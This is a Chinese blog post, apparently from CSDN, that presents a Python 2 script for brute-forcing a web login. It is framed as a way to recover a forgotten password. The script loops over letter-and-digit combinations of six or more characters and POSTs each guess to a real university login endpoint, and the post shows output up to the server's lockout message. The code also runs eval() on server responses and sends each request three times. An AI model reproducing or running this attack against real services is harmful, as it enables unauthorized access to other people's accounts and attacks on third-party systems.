【Python】忘记登录密码?遍历数字字母组合密码+模拟提交表单

最新推荐文章于 2023-06-24 14:24:43 发布
最新推荐文章于 2023-06-24 14:24:43 发布
阅读量6.7w 收藏 5
点赞数
分类专栏: Python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sinat_42483341/article/details/105018667
版权

准备

忘记了密码?试一试暴力破解吧

打开F12,填写用户名、密码后,点击登录,看到请求头信息、提交的表单信息,例如下图:
在这里插入图片描述
也可以看到此次登录请求发送到的 url:
在这里插入图片描述

也可以看到此次请求返回的结果:
在这里插入图片描述

遍历数字字母组合密码

根据以上,可以用Python伪造请求,遍历所有密码(注意多数网站会有尝试次数限制…)
(以下代码遍历的是所有不重复的字符组合,比如不会尝试111222这样的密码,此处待改进)

# -*- coding: utf-8 -*-
import cookielib
import urllib
import urllib2
from itertools import combinations

USERNAME = '这里填写用户名'


def submit_form(username, password):
    cj = cookielib.CookieJar()
    # 模拟 post 的表单数据
    post_data = urllib.urlencode({'username': username, 'password': password})
    # 登录请求发送到的 url
    path = 'https://itsapp.bjut.edu.cn/uc/wap/login/check'
    opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
    opener.addheaders = [('User-agent', 'Mozilla/5.0 (Windows NT 6.1; rv:20.0) Gecko/20100101 Firefox/20.0')]
    urllib2.install_opener(opener)
    req = urllib2.Request(path, post_data)
    conn = urllib2.urlopen(req)

    json_data = urllib2.urlopen(req).read()
    json_last = eval(json_data)
    print urllib2.urlopen(req).read()

    result_code = json_last["e"]
    if result_code == 0:
        print ('破解成功!密码是:' + password)
    else:
        print ('密码错误,当前测试:' + password)


def gen_password():
    list1 = ['1', '2', '3', '4', '5', '6', '7', '8', '9',
             'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n',
             'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z']
    for i in range(6, len(list1)):  # 6位以上不重复字符密码组合
        combine(list1, i)


def combine(temp_list, n):
    '''根据n获得列表中的所有可能组合(n个元素为一组)'''
    # temp_list2 = []
    for c in combinations(temp_list, n):
        pwd_str = ''.join(c)
        print pwd_str
        submit_form(USERNAME, pwd_str)


if __name__ == "__main__":
    gen_password()

输出结果:

123456
{"e":1,"m":"账号或密码错误","d":{}}
密码错误,当前测试:123456
123457
{"e":1,"m":"账号或密码错误","d":{}}
密码错误,当前测试:123457
123458
{"e":10016,"m":"错误次数已达最大上限,请稍后再试","d":{}}
密码错误,当前测试:123458
123459
{"e":10016,"m":"错误次数已达最大上限,请稍后再试","d":{}}
密码错误,当前测试:123459
12345a
{"e":10016,"m":"错误次数已达最大上限,请稍后再试","d":{}}
密码错误,当前测试:12345a
12345b

尝试的密码组合示例如下:

123456
123457
123458
123459
12345a
12345b
12345c
12345d
12345e
12345f
12345g
12345h
12345i
12345j
12345k
12345l
12345m
12345n
12345o
12345p
12345q
12345r
12345s
...
寒泉Hq
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
循环遍密码
06-12
输入起始密码位数和结束密码位数 然后遍它们之间的全部组合
密码生成的思路---电脑mac地址
wtt234的专栏
11-22 465
获取电脑的mac地址,生成密码的思路: # 获取网卡mac的两种办法 # 获取当前使用的本机的网卡信息信息,能获取的就是一个网卡信息 # import uuid # def get_mac_address(): # node=uuid.getnode() # mac=uuid.UUID(int=node).hex[-12:] # return mac # #============================== #window下获取mac地址的命令 cmd下运行 “.
C语言 for循环及IF条件语句创建密码输入
最新发布
weixin_73427723的博客
06-24 450
3. for循环中的"赋值语句"、"条件达式"和"循环体语句"都是选择项, 即可以缺省成只剩下“;2.for循环中语句可以为语句体, 语句体外加大括号"{}"将参加循环的语句括起来。1.for循环中的变量可以是一个也可以是多个。
暴力破解
weixin_46273733的博客
08-13 606
一、实验名称 暴力破解 二、实验环境(详细说明运行的系统、平台及代码等) 1、攻击机系统环境:Windows 7/8/10 2、浏览器:Firefox 53.0.2(64 位) 3、浏览器插件 HackBar 1.6.3.1 4、BurpSuite 1.7.11 三、实验步骤及结果 1 、 暴力破解 漏洞地址:http://222.18.158.243:10006/burp6.php 根据提示,管理员 IP 为:210.41.223.0/24、210.41.224.0/24 以上
python无限次输入密码_Python循环遍|每天想你一遍一遍一遍一遍又一遍
weixin_39785814的博客
12-07 990
与人类不同,计算机不怕苦也不怕累,无聊的事情可以重复上千遍,只要能追寻到你想要的答案。比如,一个4位的密码,计算机可以重复10000次,来找到正确的答案。比如,你需要批量下载图片;比如,你需要批量重命名文件;比如,你需要定制群发微信消息;...在python中,有两种循环语句可供我们选择使用,一种是for...in...循环语句,另一种是while循环语句。01for循环1fori...
穷举法破解密码(递归 + 多层for循环)
06-28 7746
题目要求: 1. 生成一个长度是3的随机字符串,把这个字符串作为当做密码 2. 使用穷举法生成长度是3个字符串,匹配上述生成的密码 要求: 分别使用多层for循环 和 递归解决上述问题 1)首先用递归来实现 public static void guessNum(char[] c, int index, String password){ boolean flag = fa...
expect遍密码形式设置用户密码【含sh嵌入expect和纯expect两种方式(对应不同场景)】
崔崇鑫的博客,你linux/云运维工作中的百科全书。
09-16 3283
文章目录说明sh结合expect【适合免密或能root直登的形式】代码说明脚本执行并测试纯expect【适合限制root登陆】代码说明脚本执行并测试关于\的使用说明说明expect需要转义的字符串sh中expect的3个\说明纯expect中的1个`\`说明 说明 expect遍密码形式设置用户密码,这个标题可能有点难理解,但需求就是这么个意思: 比如我有100台主机,100台主机里面均需要新建一个用户,如xz_tyng,并且每个主机的用户密码不一样,就是实现这样的需求,我应该说明白了吧。 同样需
python生成遍暴力破解密码(这里已遍暴力破解rar为例,只提供生成密码以及遍密码
guijianchouxyz的博客
10-25 2093
python生成遍暴力破解密码(这里已遍暴力破解rar为例,只提供生成密码以及遍密码) 这个也就是提供一个思路,需求是这样的,我XX的闺蜜有个rar的压缩包,不知道他是从哪里挣来的,说这个对他比较重要,但是有密码打不开,唉,可怜了我的电脑了 因为这个是暴力破解,是吧所有的密码进行的遍,也就是从1到。。。。无穷的列举出来,然后按个密码去撞,撞开了就开了,建议大家买个云服务器进行破解哈,因像这种的第一,不知道密码是几位的,第二还有特殊符号的,唉,破解时间太长了,就用8位密码来说把,全部8位测试完密码
python 脚本生成随机 字母 + 数字密码功能
09-20
本文通过一小段简的代码给大家分享基于python 脚本生成随机 字母 + 数字密码功能,感兴趣的朋友跟随脚本之家小编一起学习吧
8位数字字母密码组合大全
10-28
8位数字字母组合大全,里含有四位六位八位的数组和密码组合密码批量测试神器,批量测试网站登陆密码测试,压力承受能力测试,大神必备神器!
Python实现模拟登录提交的方法
09-21
主要介绍了Python实现模拟登录提交的方法,涉及Python正则匹配、cookie及URL操作的相关技巧,具有一定参考借鉴价值,需要的朋友可以参考下
暴力破解算法——寻找密码(进制替换法)
da_xiang的博客
12-04 4516
暴力破解算法——寻找密码(进制替换法)今天在看代码的时候发现的一种方法,我相信这种方法肯定是有人用过的,但是我也没有查到具体叫做什么方法,所以就自创了一个名字,不过这样子看起来我好像是一个不学无术的人,不过也确实如此,有空我再去查一下这个方法,有知道的可以在我下面评论一下,感谢!
解压带密码的rar文件
WJ S的专栏
12-16 764
下载对应版本的unrar可执行文件: https://www.rarlab.com/download.htm 循环解压带密码的rar文件: for file in ./*.rar do if test -f $file then unrar e -pWoShiMiMa -u $file -y fi done ...
交互式脚本遍ip和密码登录到主机执行任何命令通用版、执行交互式脚本报错root@xxx‘s password: missing close-bracket处理方法
崔崇鑫的博客,你linux/云运维工作中的百科全书。
04-19 3228
说明 我们有三四五期的物理机,每次做变动都是几百台底层物理机同步操作,其实我放了蛮多脚本,其中很多都是复用的,但后面改来改去,发现自己有点懵逼了,有点看不懂这些脚本了。。。。 而且每次之前用过的再用的时候,因为脚本被我改了,我又得改回去,有点繁琐了 所以我这次决定重新弄个脚本,专门用来做偶尔需要做些操作,但后面不会重复的那种命令,比如新建用户了之类的,这个脚本呢其实是通用的,我不会对脚本做说明,看不懂的翻看我之前的脚本,里面都有详细的说明的,这次的脚本满足下面条件 1、物理机的ip和密码是遍文件夹的
Excel密码忘记了,遍法找回密码
cuichan3604的博客
05-26 458
一个朋友自己对EXCEL的一个文档设置了密码,结果搞忘了. 但是提供的线索是: 密码是由123456后面加ABCD四个大写字母组合的四位字母组合,密码长度10位. 所以使用 Sub crack() Dim...
玛雅人的密码——BFS遍
qq_38030194的博客
05-19 211
题目描述玛雅人有一种密码,如果字符串中出现连续的2012四个数字就能解开密码。给一个长度为N的字符串,(2=<N<=13)该字符串中只含有0,1,2三种数字,问这个字符串要移位几次才能解开密码,每次只能移动相邻的两个数字。例如02120经过一次移位,可以得到20120,01220,02210,02102,其中20120符合要求,因此输出为1.如果无论移位多少次都解不开密码,输出-1。输...
【记录4】【密码生成】前端自动生成8位由字母数字组成的密码
~牧马~
12-08 4571
自动生成8位由字母数字、特殊字符组成的密码,本篇也适用于自动生成4位、6位验证码
输入一个6~16位数密码,由数字、大写字母、小写字母组成
HAI6545的博客
12-22 7947
<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta http-equiv="X-UA-Compatible" content="ie=edge"> <title>D.
python实现遍破解压缩包密码zip,rar
共同进步
05-07 811
原博主:视频详解和其他破解方法 请确保有以下第三方库包:rarfile,zipfile 如未安装: pycharm可通过setting-project-python interpreter 添加 或使用命令 pip install zipfile , pip install rarfile安装 代码奉上: class RarPassword(): def __init__(self, filename, target_path): """ :param fil
pythonexcel_如何遍excel中的列并在python中操作它?
06-08
Python 中,可以使用 `openpyxl` 库来读取和操作 Excel 文件。下面是一个简的示例代码,展示如何遍 Excel 文件中的某一列数据并对其进行操作: ``` import openpyxl # 打开 Excel 文件 workbook = openpyxl.load_workbook('example.xlsx') # 选择工作 worksheet = workbook.active # 获取第一列的值 column = worksheet['A'] # 遍列中的每个元格并操作它 for cell in column: # 打印元格的值 print(cell.value) # 对元格的值进行操作 cell.value = cell.value * 2 # 保存修改后的 Excel 文件 workbook.save('example.xlsx') ``` 在这个示例代码中,我们打开了一个名为 `example.xlsx` 的 Excel 文件,并选择了其中的活动工作。然后,我们使用 `worksheet['A']` 来获取第一列的值,并使用一个 `for` 循环遍了该列中的每个元格。在循环中,我们打印了每个元格的值,并将其乘以2,然后将修改后的值保存回 Excel 文件中。 你可以根据自己的需要修改代码中的路径和列号等参数,以满足不同的需求。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值